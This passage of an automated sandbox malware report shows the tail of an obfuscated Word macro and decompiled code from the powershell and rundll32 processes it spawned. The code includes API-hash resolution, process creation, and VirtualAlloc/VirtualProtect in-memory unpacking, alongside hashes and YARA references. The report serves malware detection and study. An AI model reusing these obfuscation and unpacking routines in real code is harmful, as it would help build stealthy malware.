
                                                                    304

                                                                    Set OaVnI = UmQHurWB

                                                                    UmQHurWB

                                                                    305

                                                                    Dim zxEzinCG, EHISACDA, aBRvB as Long

                                                                    306

                                                                    Dim XdfYSIXX as Word.Paragraph

                                                                    307

                                                                    Dim wWvlxHJH() as Byte

                                                                    308

                                                                    For Each XdfYSIXX in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    309

                                                                    wWvlxHJH = XdfYSIXX.Range

                                                                    Range

                                                                    310

                                                                    dscc = "sadsaccc" & XdfYSIXX.Range

                                                                    Range

                                                                    311

                                                                    EHISACDA = UBound(wWvlxHJH) - 1

                                                                    UBound

                                                                    312

                                                                    zxEzinCG = 0

                                                                    313

                                                                    Set wVEbaDF = WhmkB

                                                                    WhmkB

                                                                    314

                                                                    Do Until EHISACDA > EHISACDA

                                                                    315

                                                                    If wWvlxHJH(EHISACDA) = 46 Or EHISACDA = EHISACDA Then

                                                                    316

                                                                    dscc = "sasdsacc" & (zxEzinCG / 2) + 1 & " to " & (EHISACDA / 2) + 1 & MidB$(wWvlxHJH, zxEzinCG + 1, EHISACDA - zxEzinCG + 3)

                                                                    MidB$

                                                                    317

                                                                    zxEzinCG = EHISACDA + 2

                                                                    318

                                                                    Endif

                                                                    319

                                                                    EHISACDA = EHISACDA + 2

                                                                    320

                                                                    Loop

                                                                    321

                                                                    Next

                                                                    Paragraphs

                                                                    321

                                                                    SWSoCG:

                                                                    323

                                                                    End Function

                                                                    Reset < >

                                                                      Analysis Process: powershell.exe PID: 2452 Parent PID: 1552 powershell.exeCOMMON

                                                                      Executed Functions

                                                                      Function 000007FF00252E05, Relevance: .5, Instructions: 472COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2100031965.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24c2a9e5fd434beaddd41c380e015cc614590ab19d9336887c3f8f490c4b510a
                                                                      • Instruction ID: fb601fcd71fb2f06c0bb6ea399e9df49e12c94054cba189d21a259d79329ac40
                                                                      • Opcode Fuzzy Hash: 24c2a9e5fd434beaddd41c380e015cc614590ab19d9336887c3f8f490c4b510a
                                                                      • Instruction Fuzzy Hash: 2CB1DD5594EBC24FE7438B789C666A13FB0AF13211B4E41EBC4C8CB0E3E95D595AC362
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000007FF002508C0, Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2100031965.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d81105222315aa074a501b47e0b6ef8d8a9258a420a2f3cc5d243f0d6248824
                                                                      • Instruction ID: a23a781ef851a19f757089bd4314f35bfd214aa7c2d18b905ba66e2c61ccd362
                                                                      • Opcode Fuzzy Hash: 7d81105222315aa074a501b47e0b6ef8d8a9258a420a2f3cc5d243f0d6248824
                                                                      • Instruction Fuzzy Hash: 4021DD6090F7C24FE7439B384C656247FB0AF17225B4A44EBC089CB1B3DA685C59C722
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000007FF0025274B, Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2100031965.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12a81600e92471e8588c64ba58c1ea87c0fd27ac29b6ba5d0093e4f4fbf75e5f
                                                                      • Instruction ID: 709c934350238072381bf42fe58d68ba29569f0e0fd7e9884c9beb08909461bc
                                                                      • Opcode Fuzzy Hash: 12a81600e92471e8588c64ba58c1ea87c0fd27ac29b6ba5d0093e4f4fbf75e5f
                                                                      • Instruction Fuzzy Hash: F9D05E2045DACA4FE742A3386915195BFA0FF86245F4506A7ECCDDA0B3E6180BA8C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2696 Parent PID: 2724 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:5%
                                                                      Dynamic/Decrypted Code Coverage:25.3%
                                                                      Signature Coverage:1.1%
                                                                      Total number of Nodes:91
                                                                      Total number of Limit Nodes:4

                                                                      Graph

                                                                      execution_graph 4748 14fed0 4749 14feed 4748->4749 4754 14f550 4749->4754 4751 14ff7c 4757 14fb30 VirtualAlloc 4751->4757 4753 14ffb3 4755 14f591 4754->4755 4756 14f5c4 VirtualAlloc 4755->4756 4756->4751 4758 14fb8e 4757->4758 4759 14fc15 UnmapViewOfFile VirtualAlloc 4758->4759 4760 14fc50 4759->4760 4761 14fd7d 4760->4761 4762 14fd52 VirtualProtect 4760->4762 4761->4753 4762->4760 4763 10009fc7 4764 1000a076 4763->4764 4768 1000a0a1 4763->4768 4769 1000dbb2 4764->4769 4781 1000e0cc 4769->4781 4771 1000e2cc 4793 1001b0d5 4771->4793 4774 1000a089 4774->4768 4782 10013da3 4774->4782 4776 1000b871 GetPEB 4776->4781 4780 1000717b GetPEB 4780->4781 4781->4771 4781->4774 4781->4776 4781->4780 4785 10001b9d 4781->4785 4789 1001ba7b 4781->4789 4803 1000d43e 4781->4803 4806 1001a68f 4781->4806 4810 1001b82f 4781->4810 4814 1000487b 4781->4814 4783 10004010 GetPEB 4782->4783 4784 10013e4a ExitProcess 4783->4784 4784->4768 4786 10001bb0 4785->4786 4818 10004010 4786->4818 4790 1001ba9f 4789->4790 4791 10004010 GetPEB 4790->4791 4792 1001bb33 SHGetFolderPathW 4791->4792 4792->4781 4794 1001b101 4793->4794 4795 1001a68f GetPEB 4794->4795 4796 1001b312 4795->4796 4848 10019c80 4796->4848 4798 1001b352 4802 1001b35d 4798->4802 4852 1000adfc 4798->4852 4801 1000adfc GetPEB 4801->4802 4802->4774 4804 10004010 GetPEB 4803->4804 4805 1000d4f9 4804->4805 4805->4781 4807 1001a6a6 4806->4807 4856 10019fbb 4807->4856 4811 1001b845 4810->4811 4864 10019ef2 4811->4864 4815 100048a0 4814->4815 4868 1000e801 4815->4868 4819 10004076 4818->4819 4823 10001c5f lstrcmpiW 4818->4823 4824 10013c37 4819->4824 4821 10004082 4827 10008203 4821->4827 4823->4781 4831 1000a823 GetPEB 4824->4831 4826 10013cc2 4826->4821 4829 1000821a 4827->4829 4828 100082e8 4828->4823 4829->4828 4832 10003743 4829->4832 4831->4826 4833 1000386b 4832->4833 4840 1000e690 4833->4840 4836 100038b0 4838 100038d8 4836->4838 4839 10008203 GetPEB 4836->4839 4838->4828 4839->4838 4841 1000e6a6 4840->4841 4842 10004010 GetPEB 4841->4842 4843 10003896 4842->4843 4843->4836 4844 100070c5 4843->4844 4845 100070d8 4844->4845 4846 10004010 GetPEB 4845->4846 4847 10007170 4846->4847 4847->4836 4849 10019cc2 4848->4849 4850 10004010 GetPEB 4849->4850 4851 10019d51 CreateProcessW 4850->4851 4851->4798 4853 1000ae0f 4852->4853 4854 10004010 GetPEB 4853->4854 4855 1000ae92 4854->4855 4855->4801 4857 10019fd6 4856->4857 4860 10010f7a 4857->4860 4861 10010f97 4860->4861 4862 10004010 GetPEB 4861->4862 4863 1001102f 4862->4863 4863->4781 4865 10019f16 4864->4865 4866 10004010 GetPEB 4865->4866 4867 10019fac 4866->4867 4867->4781 4869 10004010 GetPEB 4868->4869 4870 100048bf 4869->4870 4870->4781

                                                                      Executed Functions

                                                                      Function 10013DA3, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 46 10013da3-10013e54 call 10004010 ExitProcess
                                                                      C-Code - Quality: 89%
                                                                      			E10013DA3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t49;

				_v12 = 0xd5;
				_v12 = _v12 + 0xee5c;
				_v12 = _v12 | 0x8aaf0837;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0xaafeb881;
				_v20 = 0xab6b;
				_v20 = _v20 + 0xffffd0c9;
				_v20 = _v20 + 0x2ddc;
				_v20 = _v20 ^ 0x00008f38;
				_v16 = 0x3314;
				_v16 = _v16 + 0x9923;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0330d641;
				_v8 = 0x7967;
				_t49 = 0x1f;
				_push(_t49);
				_v8 = _v8 / _t49;
				_push(_t49);
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xe543aa3f;
				_v8 = _v8 ^ 0xe5437a66;
				E10004010(_t49, 0xac2d26d8, 0x135, _t49, 0xed6bd295);
				ExitProcess(0);
			}








                                                                      0x10013da9
                                                                      0x10013db2
                                                                      0x10013db9
                                                                      0x10013dc0
                                                                      0x10013dc4
                                                                      0x10013dcb
                                                                      0x10013dd2
                                                                      0x10013dd9
                                                                      0x10013de0
                                                                      0x10013de7
                                                                      0x10013dee
                                                                      0x10013df5
                                                                      0x10013df9
                                                                      0x10013e00
                                                                      0x10013e0c
                                                                      0x10013e0f
                                                                      0x10013e10
                                                                      0x10013e1c
                                                                      0x10013e28
                                                                      0x10013e2b
                                                                      0x10013e32
                                                                      0x10013e45
                                                                      0x10013e4f

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 10013E4F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2108186842.0000000010021000.00000040.00000001.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: \$fzC$fzC
                                                                      • API String ID: 621844428-4050105108
                                                                      • Opcode ID: 39e0b3e0242c1929c766ff58a4197b726e5855b5b80b7d8746351de9eb5fb273
                                                                      • Instruction ID: 9f2c94031404c76f8a4347eca4ab1513b66c159a7c61353c874c37c29794b4be
                                                                      • Opcode Fuzzy Hash: 39e0b3e0242c1929c766ff58a4197b726e5855b5b80b7d8746351de9eb5fb273
                                                                      • Instruction Fuzzy Hash: A911F5B1D00308EFEB48DFA5C94A59EBBB0FB04708F208198E415B7291E7B86B45DF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0014FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0014FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0014FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0014FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2107619882.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 8a1153281cf7b3d8a74905fabf6c6c09a49ce1311eafc2b1b0eded3b52a143ad
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 7BB188B5E001099FCB48CF84D590EAEB7B5FF88314F248159E919AB355D735EE82CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 10001B9D, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 96 10001b9d-10001c6d call 10017b8c call 10004010 lstrcmpiW
                                                                      C-Code - Quality: 90%
                                                                      			E10001B9D(void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t49;
				int _t63;
				signed int _t65;
				signed int _t66;

				_push(_a8);
				_push(_a4);
				E10017B8C(_t49);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x6d740e;
				_v28 = 0x43ca31;
				_v8 = 0xde52;
				_v8 = _v8 + 0xffff302d;
				_t65 = 0x73;
				_v8 = _v8 / _t65;
				_t66 = 0x33;
				_v8 = _v8 * 0x3f;
				_v8 = _v8 ^ 0x00005145;
				_v16 = 0xb51c;
				_v16 = _v16 * 0x19;
				_v16 = _v16 ^ 0x573bb19d;
				_v16 = _v16 ^ 0x572a283c;
				_v12 = 0xa3c7;
				_v12 = _v12 / _t66;
				_v12 = _v12 * 0x3f;
				_v12 = _v12 ^ 0x0000bd7b;
				_v20 = 0x5d2c;
				_v20 = _v20 ^ 0x811e33c3;
				_v20 = _v20 ^ 0x811e27aa;
				E10004010(_t66, 0xac2d26d8, 0x79, _t66, 0xd964d70b);
				_t63 = lstrcmpiW(_a4, _a8); // executed
				return _t63;
			}














                                                                      0x10001ba3
                                                                      0x10001ba6
                                                                      0x10001bab
                                                                      0x10001bb0
                                                                      0x10001bb6
                                                                      0x10001bbd
                                                                      0x10001bc4
                                                                      0x10001bcb
                                                                      0x10001bd7
                                                                      0x10001bdc
                                                                      0x10001be5
                                                                      0x10001be9
                                                                      0x10001bec
                                                                      0x10001bf3
                                                                      0x10001c06
                                                                      0x10001c09
                                                                      0x10001c10
                                                                      0x10001c17
                                                                      0x10001c28
                                                                      0x10001c2f
                                                                      0x10001c32
                                                                      0x10001c39
                                                                      0x10001c40
                                                                      0x10001c47
                                                                      0x10001c5a
                                                                      0x10001c68
                                                                      0x10001c6d

                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(0000BD7B,572A283C), ref: 10001C68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2108186842.0000000010021000.00000040.00000001.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: <(*W
                                                                      • API String ID: 1586166983-931366690
                                                                      • Opcode ID: 79c9eacbb9d446e0444c777dfc7be36fec9ace95d4ad31c2aba0456db5e49aa4
                                                                      • Instruction ID: 5c987274e65c3c22dfdbb34c56d7d9efcbdc8bc590f707738c434fd9af89b748
                                                                      • Opcode Fuzzy Hash: 79c9eacbb9d446e0444c777dfc7be36fec9ace95d4ad31c2aba0456db5e49aa4
                                                                      • Instruction Fuzzy Hash: 062120B5D00208EFDB04CFE4C98A99EBBB1EB44304F10C08AE414AB2A0D7B99B419F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0014F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 101 14f550-14f59b call 14f960 104 14f59d-14f5a7 call 14f960 101->104 105 14f5aa-14f5da call 14f330 VirtualAlloc 101->105 104->105
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2107619882.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c6c412b1bbc447a28259970365211f4b63b13cc70bc42bd4fb778739b311ea40
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 3B113360D08289EEEB01D7E8C4057EEBFB55B21704F044098E5446A382D3BA5759C7A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 10019C80, Relevance: 1.6, APIs: 1, Instructions: 82processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 111 10019c80-10019d6c call 10017b8c call 10004010 CreateProcessW
                                                                      C-Code - Quality: 40%
                                                                      			E10019C80(struct _PROCESS_INFORMATION* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a24, struct _STARTUPINFOW* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, int _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t53;
				int _t64;
				signed int _t67;
				signed int _t68;
				WCHAR* _t75;
				struct _PROCESS_INFORMATION* _t76;

				_t75 = __edx;
				_push(0);
				_push(_a68);
				_t76 = __ecx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t53);
				_v12 = 0x6630;
				_t67 = 0x77;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x714ffcce;
				_v12 = _v12 ^ 0x714f8e45;
				_v8 = 0x1428;
				_v8 = _v8 >> 0xf;
				_t68 = 0x7f;
				_v8 = _v8 / _t68;
				_v8 = _v8 ^ 0x00007a2e;
				_v20 = 0x48d2;
				_v20 = _v20 + 0xab8a;
				_v20 = _v20 ^ 0x0000b473;
				_v16 = 0x6e9f;
				_v16 = _v16 + 0xffff30eb;
				_v16 = _v16 ^ 0xffffa3a6;
				E10004010(_t68, 0xac2d26d8, 0x2b0, _t68, 0xd9f4cde0);
				_t64 = CreateProcessW(_t75, _a8, 0, 0, _a56, 0, 0, 0, _a32, _t76); // executed
				return _t64;
			}













                                                                      0x10019c8b
                                                                      0x10019c8d
                                                                      0x10019c8e
                                                                      0x10019c91
                                                                      0x10019c93
                                                                      0x10019c96
                                                                      0x10019c99
                                                                      0x10019c9c
                                                                      0x10019c9d
                                                                      0x10019ca0
                                                                      0x10019ca3
                                                                      0x10019ca6
                                                                      0x10019ca9
                                                                      0x10019cac
                                                                      0x10019cad
                                                                      0x10019cb0
                                                                      0x10019cb1
                                                                      0x10019cb2
                                                                      0x10019cb5
                                                                      0x10019cb8
                                                                      0x10019cbb
                                                                      0x10019cbc
                                                                      0x10019cbd
                                                                      0x10019cc2
                                                                      0x10019cd0
                                                                      0x10019cd5
                                                                      0x10019cda
                                                                      0x10019ce1
                                                                      0x10019ce8
                                                                      0x10019cef
                                                                      0x10019cf6
                                                                      0x10019d01
                                                                      0x10019d04
                                                                      0x10019d0b
                                                                      0x10019d12
                                                                      0x10019d19
                                                                      0x10019d20
                                                                      0x10019d27
                                                                      0x10019d2e
                                                                      0x10019d4c
                                                                      0x10019d64
                                                                      0x10019d6c

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(00000000,FFFFA3A6,00000000,00000000,?,00000000,00000000,00000000,?,F5ADA244), ref: 10019D64
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2108186842.0000000010021000.00000040.00000001.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 2d3afecef0eae13ec00b8db049d1962f0b6ad99aa455ddf0e27f43013b9b1411
                                                                      • Instruction ID: 6f6f4ffef16e4567f02434b93fb23f43c8a1571d2b23c853eb8330a43a9d40a6
                                                                      • Opcode Fuzzy Hash: 2d3afecef0eae13ec00b8db049d1962f0b6ad99aa455ddf0e27f43013b9b1411
                                                                      • Instruction Fuzzy Hash: 6B31F9B690020CBFEF05DE95CD85CEEBB7AFB48354F108089FA1466260D7769E61AB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1001BA7B, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 116 1001ba7b-1001bb44 call 10017b8c call 10004010 SHGetFolderPathW
                                                                      C-Code - Quality: 58%
                                                                      			E1001BA7B(void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t43;
				intOrPtr* _t52;
				void* _t53;
				signed int _t54;
				void* _t60;

				_t60 = __edx;
				E10017B8C(_t43);
				_v28 = 0x37183;
				_v24 = 0;
				_v20 = 0xc1e;
				_v20 = _v20 ^ 0x1ddfc436;
				_v20 = _v20 ^ 0x1ddf9af4;
				_v16 = 0xef7f;
				_t54 = 0x45;
				_v16 = _v16 * 0x79;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x001c4db5;
				_v12 = 0x4c2e;
				_v12 = _v12 << 0xd;
				_v12 = _v12 / _t54;
				_v12 = _v12 ^ 0x00237cb0;
				_v8 = 0xd2af;
				_v8 = _v8 << 5;
				_v8 = _v8 + 0xffffc92f;
				_v8 = _v8 ^ 0x001a0fe8;
				_t52 = E10004010(_t54, 0xeed7a5cf, 0x2d2, _t54, 0x708e2747);
				_t53 =  *_t52(0, _t60, 0, 0, _a20, 0, __edx, 0, _a8, _a12, 0, _a20, _a24, _a28); // executed
				return _t53;
			}














                                                                      0x1001ba88
                                                                      0x1001ba9a
                                                                      0x1001ba9f
                                                                      0x1001baa8
                                                                      0x1001baab
                                                                      0x1001bab2
                                                                      0x1001bab9
                                                                      0x1001bac0
                                                                      0x1001bacd
                                                                      0x1001bad1
                                                                      0x1001bad4
                                                                      0x1001bad8
                                                                      0x1001badf
                                                                      0x1001bae6
                                                                      0x1001baf4
                                                                      0x1001bafc
                                                                      0x1001bb03
                                                                      0x1001bb0a
                                                                      0x1001bb0e
                                                                      0x1001bb15
                                                                      0x1001bb2e
                                                                      0x1001bb3d
                                                                      0x1001bb44

                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00037183,?,?,?,?,?,?,?,?,00000003,1B835AC8,1B835AC8), ref: 1001BB3D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2108186842.0000000010021000.00000040.00000001.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: b1a1f18e4c2d1cca216e18cf7875c89d58af22bf91d37e0d639e08c95d6c68c0
                                                                      • Instruction ID: e57e8dc99711bf8f73612d28d45590ecd43cf8e3c82c42321f98dcc01df6ce76
                                                                      • Opcode Fuzzy Hash: b1a1f18e4c2d1cca216e18cf7875c89d58af22bf91d37e0d639e08c95d6c68c0
                                                                      • Instruction Fuzzy Hash: 322134B5D00209BBDB10DFAAC84A8EFBFB8EB95314F108089F924A6250C3B44A55DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 1000A823, Relevance: .0, Instructions: 2COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E1000A823() {

				return  *[fs:0x30];
			}



                                                                      0x1000a829

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2108186842.0000000010021000.00000040.00000001.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: rundll32.exe PID: 824 Parent PID: 2696 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 19fed0 1174 19feed 1173->1174 1179 19f550 1174->1179 1176 19ff7c 1182 19fb30 VirtualAlloc 1176->1182 1178 19ffb3 1180 19f591 1179->1180 1181 19f5c4 VirtualAlloc 1180->1181 1181->1176 1183 19fb8e 1182->1183 1184 19fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 19fc50 1184->1186 1185 19fd7d 1185->1178 1186->1185 1187 19fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Function 0019FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0019FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2115667176.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 4301d48abf177ebe90760239a07af0eb2c69c163b1270af7d412781154210f3b
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 0EB19AB5E00109EFCB48CF84D590EAEB7B5BF88314F248159E919AB355D735EE82CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0019F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 19f550-19f59b call 19f960 42 19f5aa-19f5da call 19f330 VirtualAlloc 39->42 43 19f59d-19f5a7 call 19f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2115667176.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
